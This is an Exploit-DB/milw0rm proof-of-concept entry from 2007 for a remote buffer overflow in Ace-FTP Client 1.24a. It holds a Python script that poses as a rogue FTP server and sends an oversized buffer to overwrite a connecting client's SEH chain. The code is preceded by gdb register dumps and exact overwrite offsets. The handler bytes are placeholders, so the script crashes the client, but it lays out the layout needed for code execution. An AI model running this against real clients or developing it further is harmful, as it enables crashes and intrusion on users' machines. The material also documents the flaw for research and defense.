Ace-FTP Client 1.24a - Remote Buffer Overflow (PoC)

EDB-ID:

4058


Author:

n00b

Type:

dos


Platform:

Windows

Date:

2007-06-10


#!/usr/bin/python
#######################################################################
#Credit to n00b for finding the bug.
#Ace-Ftp client buffer over flow p0c.
#This is possible to exploit as we 
#Smash the seh handlers and there are
#Plenty of registers that had our buffer
#Im still new to seh over writes I haven't 
#Had much experience with the seh over write
#But get the Idea from what I've read about
#It..Any way this script creates a listening 
#Socket and act's as a ftp server then when the 
#Client connect's a huge buffer is sent back to
#The client.Resulting and a buffer overflow.
#If any one feel's like investigating or writing
#A poc for this please do so give some credits to 
#n00b.I will give it a try during the week.
#######################################################################
#Shouts: - Str0ke - Marsu - SM - vade79 - c0ntex - Kevin Finisterre
#######################################################################
#Tested:Win xp sp2.
#Version Affected: v1.24a.
###################################################
#               \\Debug info//
###################################################
#Program received signal SIGSEGV,Segmentation fault.
#[Switching to thread 1312.0x714]
#0x00403c58 in ?? ()
#
#(gdb) i r
#
#eax            0x41414141       1094795585  <----Eax over written..
#ecx            0x0      0
#edx            0xa5b464 10859620
#ebx            0x41414141       1094795585  <----Ebx over written..
#esp            0x12e458 0x12e458
#ebp            0x12f48c 0x12f48c
#esi            0x12e488 1238152
#edi            0xa5b464 10859620
#eip            0x403c58 0x403c58
#eflags         0x10206  66054
#cs             0x1b     27
#ss             0x23     35
#ds             0x23     35
#es             0x23     35
#fs             0x3b     59
#gs             0x0      0
#fctrl          0xffff1272       -60814
#fstat          0xffff0000       -65536
#ftag           0xffffffff       -1
#fiseg          0x0      0
#fioff          0x0      0
#foseg          0xffff0000       -65536
#fooff          0x0      0
###################################################
#What the register look like after crash..
###################################################
#EAX 41414141
#ECX 00000000
#EDX 00A5D930 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA
#EBX 41414141
#ESP 0012E458
#EBP 0012F48C ASCII "AAAAAAAAAAAADDDDEEEECCCCCCC
#ESI 0012E488 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA
#EDI 00A5D930 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA
#EIP 00403C58 
###################################################
#DS:[41414141]=???
#EDX=00A5D930, (ASCII "AAAAAAAAAAAAAAAAAAAAAAAAA)
#MOV EDX,DWORD PTR DS:[EAX]
###################################################
#SEH chain of main thread
#Address    SE handler
#---------------------------
#0012E46C   AceXFTP.00430B9E
#45454545
#---------------------------
#0012F498   44444444  Pointer to next SEH record
#0012F49C   45454545  SE handler
#
#4112byte's to over write Pointer to next SEH record
#next 4 bytes over writes se handler.
###################################################


from socket import *
from struct import pack

host = "127.0.0.1 "
port = 21

Size_of_buf1  = 4112 
Size_of_buf2 =  550


s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\nPort %d open Waiting !!!! ..." % port

cl, addr = s.accept()
print "Vic is connected %s" % addr[0]

buf1 =  "A" * Size_of_buf1 

NEXT_SEH_RECORD  = "\x44\x44\x44\x44"

SE_HANDLER       = "\x45\x45\x45\x45" 

buf2  = "C" * Size_of_buf2

End  = "\r\n" 

cl.send(buf1 + NEXT_SEH_RECORD + SE_HANDLER + buf2 + End)
print "mission accomplished : OK\n"

sleep(3)
cl.close()
s.close()

# milw0rm.com [2007-06-10]